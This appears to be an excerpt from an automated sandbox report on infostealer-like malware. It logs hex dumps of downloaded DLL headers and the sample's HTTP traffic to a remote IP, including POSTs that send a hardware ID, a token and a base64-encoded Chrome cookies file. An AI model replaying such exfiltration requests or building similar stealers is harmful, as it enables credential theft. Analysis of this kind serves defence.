00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:01:07 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:01:07 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:01:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:01:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 185.172.128.151Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 32 38 33 44 39 31 38 32 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="hwid"C0283D9182EA20379026------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="build"default100------FBFHJJJDAFBKEBGDGHCG--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHHost: 185.172.128.151Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"browsers------BKKKEGIDBGHIDGDHDBFH--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKEHost: 185.172.128.151Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="message"plugins------JDGIIDHJEBGIDHJJDBKE--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 185.172.128.151Content-Length: 7855Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/sqlite3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 185.172.128.151Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 38 66 64 62 32 34 34 34 35 37 33 64 31 39 33 31 61 39 37 62 30 37 34 36 31 65 35 38 35 32 31 38 39 33 35 33 34 35 63 66 32 62 35 32 32 61 30 38 65 35 64 33 33 34 36 39 32 35 36 62 63 37 34 39 32 30 31 32 31 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 2d 2d 0d 0a Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"028fdb2444573d1931a97b07461e585218935345cf2b522a08e5d33469256bc74920121a------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
